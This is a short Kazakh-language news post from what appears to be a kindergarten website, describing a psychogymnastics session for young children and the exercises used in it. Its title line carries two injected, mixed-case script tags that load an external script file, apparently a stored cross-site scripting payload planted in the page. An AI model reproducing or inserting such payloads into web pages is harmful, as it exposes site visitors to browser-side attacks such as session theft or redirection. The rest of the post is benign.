«Күнге қонаққа»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.10.2021

Кішкентай балаларға психологиялық қолдау қажет екендігін  ешкімге дәлелдеудің қажеті жоқ. Бөбекжайдағы Психогимнастика бұл мәселені шешуге ықпал етеді. «Қуаныш» және «Айналайын» орта топтарының балаларымен психогимнастика жүргізіледі. Педагог-психологтың жоспары бойынша «Күнге қонаққа» тақырыбында психогимнастика өткізілді. Балалар қонаққа жиналып жатып, «Өзімізді мүсідейміз» жаттығуын орындады. Бұл жаттығу бет бұлшықеттеріндегі кернеуді жеңілдетуге көмектесті. Өз-өздерін екі қолдарымен  құшақтап,  жақсы сөздер айтқаны, әр баланың өзін-өзі бағалауына көмектесті. «Зообақ» және «Күн мен бұлт» жаттығулары өзін-өзі бақылауды, зейінді, қозғалысты үйлестіруді дамытып, психоэмоционалды стрессті жеңілдету мәселелерін шешуге бағытталды. «Ойыншықтар»  және «Балабақшаға бару уақыты» ұсақ моториканың дамуына ықпал етті. Психо-гимнастиканың соңында балалар өздерінің көңіл-күйлерімен бөлісіп, бір-біріне күлкі сыйлады.

Педагог-психолог: Тяглая И. А.

Просмотров: 286


Пікір қосу



Деректерді қолтаңбаға қосу
Текст